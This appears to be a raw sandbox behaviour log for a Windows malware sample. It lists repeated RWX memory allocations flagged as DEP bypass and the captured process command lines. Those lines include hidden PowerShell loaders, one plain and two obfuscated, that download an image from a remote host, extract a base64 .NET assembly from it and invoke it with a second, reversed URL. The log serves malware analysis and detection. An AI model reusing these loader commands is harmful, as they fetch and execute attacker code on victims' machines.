heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02292000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0229c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02293000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02294000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02295000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02296000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02297000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02298000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02299000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02931000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02932000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02933000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02934000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02935000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02936000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02937000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02938000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02939000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0293a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0293b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0293c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0293d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0293e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0293f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.xomo/25.84.011.97//:ptth');$method.Invoke($null, $arguments)"
cmdline powershell -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░1░░░DY░░░Mw░░░v░░░DY░░░Mg░░░x░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░dQBu░░░Gk░░░dgBl░░░HI░░░cwBv░░░F8░░░dgBi░░░HM░░░LgBq░░░H░░░░░░ZQBn░░░D8░░░MQ░░░2░░░Dk░░░M░░░░░░5░░░DM░░░MQ░░░4░░░DU░░░NQ░░░n░░░Ds░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░g░░░D0░░░I░░░BO░░░GU░░░dw░░░t░░░E8░░░YgBq░░░GU░░░YwB0░░░C░░░░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBO░░░GU░░░d░░░░░░u░░░Fc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░Ds░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░CQ░░░dwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░LgBE░░░G8░░░dwBu░░░Gw░░░bwBh░░░GQ░░░R░░░Bh░░░HQ░░░YQ░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FU░░░cgBs░░░Ck░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBU░░░GU░░░e░░░B0░░░C4░░░RQBu░░░GM░░░bwBk░░░Gk░░░bgBn░░░F0░░░Og░░░6░░░FU░░░V░░░BG░░░Dg░░░LgBH░░░GU░░░d░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░EI░░░eQB0░░░GU░░░cw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░FM░░░V░░░BB░░░FI░░░V░░░░░░+░░░D4░░░Jw░░░7░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░EU░░░TgBE░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░PQ░░░g░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░LgBJ░░░G4░░░Z░░░Bl░░░Hg░░░TwBm░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░GU░░░bgBk░░░EY░░░b░░░Bh░░░Gc░░░KQ░░░7░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwBl░░░C░░░░░░M░░░░░░g░░░C0░░░YQBu░░░GQ░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwB0░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░Kw░░░9░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░u░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ds░░░J░░░Bi░░░GE░░░cwBl░░░DY░░░N░░░BM░░░GU░░░bgBn░░░HQ░░░a░░░░░░g░░░D0░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░FM░░░dQBi░░░HM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Cw░░░I░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ck░░░Ow░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBD░░░G8░░░bgB2░░░GU░░░cgB0░░░F0░░░Og░░░6░░░EY░░░cgBv░░░G0░░░QgBh░░░HM░░░ZQ░░░2░░░DQ░░░UwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░KQ░░░7░░░CQ░░░b░░░Bv░░░GE░░░Z░░░Bl░░░GQ░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBS░░░GU░░░ZgBs░░░GU░░░YwB0░░░Gk░░░bwBu░░░C4░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░F0░░░Og░░░6░░░Ew░░░bwBh░░░GQ░░░K░░░░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HQ░░░eQBw░░░GU░░░I░░░░░░9░░░C░░░░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░LgBH░░░GU░░░d░░░BU░░░Hk░░░c░░░Bl░░░Cg░░░JwBG░░░Gk░░░YgBl░░░HI░░░LgBI░░░G8░░░bQBl░░░Cc░░░KQ░░░7░░░CQ░░░bQBl░░░HQ░░░a░░░Bv░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░B0░░░Hk░░░c░░░Bl░░░C4░░░RwBl░░░HQ░░░TQBl░░░HQ░░░a░░░Bv░░░GQ░░░K░░░░░░n░░░FY░░░QQBJ░░░Cc░░░KQ░░░7░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░I░░░░░░9░░░C░░░░░░L░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB4░░░G8░░░bQBv░░░C8░░░Mg░░░1░░░C4░░░O░░░░░░0░░░C4░░░M░░░░░░x░░░DE░░░Lg░░░5░░░Dc░░░Lw░░░v░░░Do░░░c░░░B0░░░HQ░░░a░░░░░░n░░░Ck░░░Ow░░░k░░░G0░░░ZQB0░░░Gg░░░bwBk░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░KQ░░░='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('░░░','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░1░░░DY░░░Mw░░░v░░░DY░░░Mg░░░x░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░dQBu░░░Gk░░░dgBl░░░HI░░░cwBv░░░F8░░░dgBi░░░HM░░░LgBq░░░H░░░░░░ZQBn░░░D8░░░MQ░░░2░░░Dk░░░M░░░░░░5░░░DM░░░MQ░░░4░░░DU░░░NQ░░░n░░░Ds░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░g░░░D0░░░I░░░BO░░░GU░░░dw░░░t░░░E8░░░YgBq░░░GU░░░YwB0░░░C░░░░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBO░░░GU░░░d░░░░░░u░░░Fc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░Ds░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░CQ░░░dwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░LgBE░░░G8░░░dwBu░░░Gw░░░bwBh░░░GQ░░░R░░░Bh░░░HQ░░░YQ░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FU░░░cgBs░░░Ck░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBU░░░GU░░░e░░░B0░░░C4░░░RQBu░░░GM░░░bwBk░░░Gk░░░bgBn░░░F0░░░Og░░░6░░░FU░░░V░░░BG░░░Dg░░░LgBH░░░GU░░░d░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░EI░░░eQB0░░░GU░░░cw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░FM░░░V░░░BB░░░FI░░░V░░░░░░+░░░D4░░░Jw░░░7░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░EU░░░TgBE░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░PQ░░░g░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░LgBJ░░░G4░░░Z░░░Bl░░░Hg░░░TwBm░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░GU░░░bgBk░░░EY░░░b░░░Bh░░░Gc░░░KQ░░░7░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwBl░░░C░░░░░░M░░░░░░g░░░C0░░░YQBu░░░GQ░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwB0░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░Kw░░░9░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░u░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ds░░░J░░░Bi░░░GE░░░cwBl░░░DY░░░N░░░BM░░░GU░░░bgBn░░░HQ░░░a░░░░░░g░░░D0░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░FM░░░dQBi░░░HM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Cw░░░I░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ck░░░Ow░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBD░░░G8░░░bgB2░░░GU░░░cgB0░░░F0░░░Og░░░6░░░EY░░░cgBv░░░G0░░░QgBh░░░HM░░░ZQ░░░2░░░DQ░░░UwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░KQ░░░7░░░CQ░░░b░░░Bv░░░GE░░░Z░░░Bl░░░GQ░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBS░░░GU░░░ZgBs░░░GU░░░YwB0░░░Gk░░░bwBu░░░C4░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░F0░░░Og░░░6░░░Ew░░░bwBh░░░GQ░░░K░░░░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HQ░░░eQBw░░░GU░░░I░░░░░░9░░░C░░░░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░LgBH░░░GU░░░d░░░BU░░░Hk░░░c░░░Bl░░░Cg░░░JwBG░░░Gk░░░YgBl░░░HI░░░LgBI░░░G8░░░bQBl░░░Cc░░░KQ░░░7░░░CQ░░░bQBl░░░HQ░░░a░░░Bv░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░B0░░░Hk░░░c░░░Bl░░░C4░░░RwBl░░░HQ░░░TQBl░░░HQ░░░a░░░Bv░░░GQ░░░K░░░░░░n░░░FY░░░QQBJ░░░Cc░░░KQ░░░7░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░I░░░░░░9░░░C░░░░░░L░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB4░░░G8░░░bQBv░░░C8░░░Mg░░░1░░░C4░░░O░░░░░░0░░░C4░░░M░░░░░░x░░░DE░░░Lg░░░5░░░Dc░░░Lw░░░v░░░Do░░░c░░░B0░░░HQ░░░a░░░░░░n░░░Ck░░░Ow░░░k░░░G0░░░ZQB0░░░Gg░░░bwBk░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░KQ░░░='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('░░░','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2644
thread_handle: 0x000002e8
